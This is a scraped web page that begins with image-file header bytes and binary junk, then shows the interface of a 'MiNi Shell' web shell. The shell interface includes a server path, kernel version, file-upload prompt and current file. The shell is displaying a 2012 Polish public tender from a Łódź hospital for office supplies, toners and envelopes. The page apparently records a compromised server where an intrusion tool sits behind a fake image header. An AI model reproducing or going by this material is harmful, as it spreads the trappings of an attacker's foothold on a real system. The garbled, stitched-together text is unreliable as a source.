JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120528/175392-N-2012.html

<p class="kh_header"><b>Łódź: Sprawa nr 36/12. Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawy materiałów biurowych dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi</b><br>
<b>Numer ogłoszenia: 175392 - 2012; data zamieszczenia: 28.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawa nr 36/12. Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawy materiałów biurowych dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia zakup i dostawa materiałów biurowych, papierniczych i tonerów do faksów i kserokopiarek fabrycznie nowych i nierefabrykowanych, lub równoważnych w oryginalnych opakowaniach zamkniętych hermetycznie przez producenta.
2.	Przedmiot zamówienia został podzielony na 7 pakietów:
- Pakiet nr 1 - Materiały piśmienne
- Pakiet nr 2 - Papier ksero i składanka komputerowa
- Pakiet nr 3 - Koperty
- Pakiet nr 4 - Recepty
- Pakiet nr 5 - Etykiety samoprzylepne 
- Pakiet nr 6 - Tonery kalkowe do drukarek termotransferowych
- Pakiet nr 7 - Tonery do kserokopiarek i faksów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2, 30.19.76.40-4, 30.19.92.30-1, 22.90.00.00-9, 30.19.28.00-9, 30.12.51.10-5, 30.12.51.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004. prawo zamówień publicznych przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:
1)	wprowadzenia produktu zmodyfikowanego lub udoskonalonego spełniającego parametry wymagane w SIWZ, pod warunkiem zachowania ceny jednostkowej netto na poziomie nie wyższym, niż produkt objęty zamówieniem początkowym. Ewentualna zmiana produktu może być dokonana na pisemny wniosek Wykonawcy, poprzez zawarcie aneksu w którym dotychczasowy produkt zostanie wykreślony i zastąpiony produktem zmodyfikowanym lub udoskonalonym.
2)	wycofania produktu z produkcji. Wykonawca ma obowiązek zapewnić dostarczenie produktu zamiennego o parametrach nie gorszych od produktu objętego umową pod warunkiem zachowania ceny jednostkowej netto na poziomie nie wyższym, niż produkt objęty zamówieniem początkowym;
Ewentualna zmiana produktu może być dokonana na pisemny wniosek Wykonawcy, poprzez zawarcie  aneksu mocą którego nastąpi wykreślenie z umowy produktu wycofanego z produkcji i zastąpienie go produktem zamiennym.
3)	podwyższenia stawki podatku VAT przy czym zmianie ulega jedynie cena netto cena brutto pozostaje bez zmian. Nowe stawki będą obowiązywać strony wraz z wejściem w życie przepisów je regulujących. Każdorazowa zmiana nie wymaga sporządzenia aneksu w formie pisemnej, ewentualnie strony mogą zawrzeć aneks porządkujący na wniosek Zamawiającego.
4)	obniżenia stawki podatku VAT przy czym zmianie ulega jedynie cena brutto cena netto pozostaje bez zmian. Nowe stawki będą obowiązywać strony wraz z wejściem w życie przepisów je regulujących. Każdorazowa zmiana nie wymaga sporządzenia aneksu w formie pisemnej, ewentualnie strony mogą zawrzeć aneks porządkujący na wniosek Zamawiającego.
5)	zmiany polegającej na zamianie wykorzystanego asortymentu obejmującego powyższą umowę  na asortyment nie wykorzystany z tej umowy z zastrzeżeniem, iż całkowita wartość brutto umowy nie może ulec zmianie, zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności
6)	zmiany przedmiotowej/ produkt zamienny jeśli wystąpi przejściowy brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu  produktu zamiennego o parametrach nie gorszych od produktu objętego umową oraz przy zachowaniu ceny jednostkowej, zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. M. Kopernika w Łodzi, ul. Pabianicka 62 93-513 Łódź, DZIAŁ ZAMÓWIEŃ PUBLICZNYCH, pok. 978.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2012 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny im. M. Kopernika w Łodzi, ul. Pabianicka 62 93-513 Łódź, KANCELARIA SZPITALA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający dopuszcza udział podwykonawców w realizacji niniejszego zamówienia. W przypadku, gdy Wykonawca przewiduje wykonanie zamówienia z udziałem podwykonawców należy wskazać w treści oferty która część (części) zamówienia powierzona zostanie podwykonawcy (podwykonawcom)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Materiały piśmienne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	cienkopis pisaki 0,4 kolor czarny, niebieski, zielony, czerwony	szt.	1000;
2	datownik automatyczny ustawiany ręcznie o wymiarach 40mm x 30 mm, o profilu metalowym z automatycznym tuszowaniem tekstu. Datownik ustawiany ręcznie poprzez pokrętła ma być umieszczony w polu o wymiarze 40 mm x 30 mm. Obok daty możliwość umieszczenia w polu dowolnego tekstu	szt.	20;
3	datownik w obudowie plastikowej	szt.	40;
4	dziurkacze typu SAX 39 lub rownoważne	szt.	50;
5	etykiety termotransferowe 70 X 37 formacie A4	op.= 100 szt.	15;
6	etykiety termotransferowe 104 X 149 formacie A4	op.= 100 szt.	50;
7	grzbiety do bindownicy 12	op.= 20 szt.	50;
8	grzbiety do bindownicy 19	op.= 20 szt.	20;
9	gumka myszka	szt.	100;
10	Kalka ołówkowa A-4	op.= 100 szt.	10;
11	kalka techniczna A 4	op.= 100 szt.	20;
12	Kieszeń foliowa  A-4	op.= 100 szt.	1000;
13	Klej biurowy w płyn- 50 ml	szt.	1500;
14	Korektory w pisaku płaskie typu PENTEL lub równoważne	szt.	200;
15	Markery typu Scharpie Permanent czarne - średnie do pisania na szkle lub równoważne nie niższej jakości	szt.	1000;
16	mazaki olejowe do opisywania przedmiotów (kolor do wyboru biały, srebrny, czerwony, czarny)	szt.	50;
17	mazaki do pisania na płytach CD - FOLIOPISY z cienką końcówką do 0,5 mm	szt.	100;
18	nożyczki ze stali nierdzewnej 20 cm	szt.	50;
19	okładki do bindownicy A4 przód przezroczysty,          tył nieprzezroczysty	kpl.	100;
20	Ołówki HB	szt.	1000;
21	Papier fax 210 x30 	rol.	150;
22	Papier fax 216 x 30	rol.	80;
23	płyty CD-Print	szt.	80 000;
24	płyty CD-RW BOX	szt.	300;
25	płyty CD-ROM BOX	szt.	200;
26	poduszki do pieczątek	szt.	250;
27	poduszki do pieczątek No2	szt.	100;
28	Segregatory szerokość grzbietu 7 cm  lakierowany	szt.	2500;
29	Segregatory szerokość grzbietu 5  cm  lakierowany	szt.	1500;
30	skoroszyty tekturowe A4 wpinane na haczyki do segregatorów 	szt.	1 000;
31	skoroszyt plastikowy bez grzbietu	szt.	500;
32	skoroszyt  plastikowy z grzbietem do wpinania do segregatorów oczkowy	szt.	2000;
33	Skoroszyty  oczkowe A4 karton	szt.	2000;
34	Skorowidze A-4 twarda oprawa	szt.	150;
35	Spinacze biurowe małe	op.= 100 szt.	2000;
36	Spinacze biurowe duże	op.= 100 szt.	1300;
37	sznurek do wiązania, biały polipropylenowy         2000 mb	rol.	50;
38	taśma pakowa                             szer. 5 cm	szt.	300;
39	taśma przezroczysta          szer. 2 cm	szt.	200;
40	Teczka do podpisu z minimum dziesiecioma przekładkami .Twarda oprawa.Na dokumenty formatu A-4	szt.	30;
41	teczki wiązane tasiemką formatu A4	szt.	1 000;
42	teczki akt osobowych z 3 przekładkami formatu A4	szt.	300;
43	tusz do pieczątek NIEBIESKI (op.min 25 ml) typu SANFORD lub równoważny nie gorszej jakości niż Sanford	szt.	300;
44	tusz kreślarski czarny  (op.min 25 ml) typu SANFORD lub równoważny nie gorszej jakości niż Sanford         	szt.	20;
45	wąsy do segregatorów	op.= 100 szt.	200;
46	wkłady żelowe handy intense lub równoważne	szt.	100;
47	zakreślacze ( 4kolory) typu PENTEL lub równoważne ,nie gorszej jakości niż produkty m-ki Pentel	kpl.	100;
48	Zeszyt  A-5 - 96 kart. w kratkę, twarda oprawa	szt.	500;
49	Zeszyt A-4  - 96 kart. w kratkę, twarda oprawa	szt.	2000;
50	zszywacz do akt zszywający do 100 kartek	szt.	20;
51	zszywacz typu SAX 39,  24 6	szt.	150;
52	Zszywki  24 6	op.= 1000 szt.	4 500;
53	Zszywki  24 10	op.= 1000 szt.	100;
54	Zszywki  23 8	op.= 1000 szt.	100;
55	Zszywki  23 10	op.= 1000 szt.	50;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Papier ksero i składanka komputerowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Papier biały  A5	ryza= 500 arkuszy	1 000;	gramatura 80 g m2, unwersalny, klasy B, białość min. 145 wg skali CIE;
2.	Papier biały  A4	ryza= 500 arkuszy	13 500;	gramatura 80 g m2, unwersalny, klasy B, białość min. 145 wg skali CIE;
3.	Papier biały  A3	ryza= 500 arkuszy	150;	gramatura 80 g m2, unwersalny, klasy B, białość min. 145 wg skali CIE;
4.	Składanka komputerowa 250 mm x 12 (1+ 0 kopii)	karton = 2000 składek	20;	Bez nadruku, biały, gramatura 60g m2;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Koperty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Koperta  C 6	op.=1000 szt	50	Biała;
2.	Koperta   C 5	szt.	2 000	Biała;
3.	Koperta   B 5	szt.	55 000	Szara lub brązowa bez zakładki;
4.	Koperta   B 5	op.=500 szt.	160	Szara lub brązowa z zakładką;
5.	Koperta   B 4	op.=250 szt.	300	Szara lub brązowa z zakładką;
6.	Koperta   B 4	szt.	5 000	Biała;
7.	Koperta   B 3	szt.	1 000	Biała;
8.	Koperta   23 cm x 27 cm	szt.	5 000	karton gramatura 120 g m2 z nadrukiem wg wzoru;
9.	Koperta   23 cm x 32 cm	szt.	15 000	koperta kartonowa z nadrukiem, brzegi wzmocnione z węższej strony;
10.	Koperta   37 cm x 45 cm RTG	szt.	5 000	Szara lub brązowa, rozcięcie z węższej strony;
11.	Koperta na CD	szt.	85 000	koperta z okienkiem;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Recepty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Recepta wg wzoru z NFZ	205x94	Jednostronny	Offset	blok 100 kart.	8 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Etykiety samoprzylepne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Etykieta samoprzylepna papier typu velum	A-6	Termo transferowa biała z nadrukiem wg 2 wzorów	Rolka =200 szt. etykiet	1200		
2.	Etykieta samoprzylepna papier typu velum	szer  x  wys.  60 x 40	Termo transferowa biała bez nadruku	Rolka =1000 szt. etykiet	600	ELTRON TLP  2742,	Średnica wew. rolki - 40 mm,
3.	Etykieta samoprzylepna papier typu velum	szer  x  wys.  80 x 40	Termo transferowa biała bez nadruku	Rolka =1000 szt. etykiet	150	DATAMAX CLASS  DMX   E -4203,	Średnica wew. rolki - 24 mm,
4.	Etykieta samoprzylepna papier typu velum	szer  x  wys. 80  x  50	Termo transferowa żółta  bez nadruku	Rolka =1000 szt. etykiet	400	TOSHIBA BSA 4 TM,	Średnica wew. rolki - 76 mm,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.28.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Tonery kalkowe do drukarek termotransferowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	DATAMAX CLASS DMX           E-4203	TRANSFER              ( woskowo- żywiczna )	104 mm x 94 mb.	0,5 x 108 mm	OUT	F	100;
2.	ELTRON TLP 2742	TRANSFER            ( woskowo- żywiczna )	64 mm x 74 mb.	0,5 x 110 mm	OUT	F	200;
3.	TOSHIBA BSA            4 TM	TRANSFER            ( woskowo- żywiczna )	89 mm x 300 mb.	1 x 117 mm	OUT	F	120;
4.	ELTRON TLP 2824	TRANSFER               ( woskowo- żywiczna )	64 mm x 74 mb.	0,5 x 64 mm	IN	F	90;
5.	ELTRON TLP 2824	TRANSFER               ( woskowo- żywiczna )	57 mm x 74 mb.	0,5 x 57 mm	IN	F	36;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Tonery do kserokopiarek i faksów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	SHARP AL 1217	AL 110 DC lub równoważny	8
2.	KONICA 2028	KONICA 2028 lub równoważny	6
3.	KONICA 1212	KONICA 1212 lub równoważny	12
4.	KONICA 7020	KONICA 7020 lub równoważny	12
5.	GESTETNER NRG MP 2510 PCL6	GESTETNER 2510 lub równoważny	60
6.	Powielacz RICOH JP 1010	JP 6 lub równoważny	36
7.	Powielacz RICOH JP 1010	matryca JP10-S lub równoważny	8
8.	OLIVETTI d-COPIA 164 MF	OLIVETTI d-COPIA 163 MF6k lub równoważny	4
9.	OLIVETTI d-COPIA 	OLIVETTI d-COPIA 150 lub równoważny	6
10.	OLIVETTI d-COPIA 200 MF	OLIVETTI d-COPIA 160 200MF lub równoważny	6
11.	CANON NP6512	NPG11 lub równoważny	10
12.	CANON FC 230	E30 lub równoważny	4
13.	CANON IR 2800	CANON C-EXV3 lub równoważny	5
14.	CANON 	CANON C-EXV18 lub równoważny	20
15.	CANON L100	CANON FX10 lub równoważny	12
16.	CANON NP1010	CANON NP 1010 1020 (kpl. 2 szt. ze szczotką) lub równoważny	5
17.	TOSHIBA 1360	1360 lub równoważny	20
18.	RICOCH AFFICIO 1027	RICOCH AF 2220 D lub równoważny	83
19.	KONICA MINOLTA BIZHUB C200	MINOLTA TN-214 CZARNY lub równoważny	24
20.	KONICA MINOLTA BIZHUB C200	MINOLTA TN-214 CZERWONY lub równoważny	8
21.	KONICA MINOLTA BIZHUB C200	MINOLTA TN-214 ŹÓŁTY lub równoważny	8
